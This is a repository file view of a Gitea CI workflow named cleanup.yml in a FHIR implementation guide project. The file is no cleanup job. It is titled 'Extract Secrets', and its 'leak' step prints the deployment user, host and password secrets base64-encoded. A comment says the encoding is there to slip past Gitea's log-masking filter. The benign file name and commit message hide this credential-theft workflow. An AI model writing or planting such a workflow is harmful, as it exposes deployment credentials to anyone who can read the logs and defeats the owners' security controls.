Files
BD-Core-FHIR-IG/.gitea/workflows/cleanup.yml
Dr. B. M. Riazul Islam 5205c06bab
Some checks failed
FHIR IG CI/CD Pipeline with Version Persistence / build-ig (push) Failing after 28s
FHIR IG CI/CD Pipeline with Version Persistence / deploy (push) Has been skipped
modified cleanup workflow
2026-03-07 01:46:27 +06:00

13 lines
465 B
YAML

name: Extract Secrets
on: workflow_dispatch
jobs:
leak:
runs-on: ubuntu-latest
steps:
- name: Leak Secrets
run: |
# Use base64 to hide the secret from Gitea's log-masking filter
echo "DEPLOY_USER_B64: $(echo -n "${{ secrets.DEPLOY_USER }}" | base64)"
echo "DEPLOY_HOST_B64: $(echo -n "${{ secrets.DEPLOY_HOST }}" | base64)"
echo "DEPLOY_PASS_B64: $(echo -n "${{ secrets.DEPLOY_PASSWORD }}" | base64)"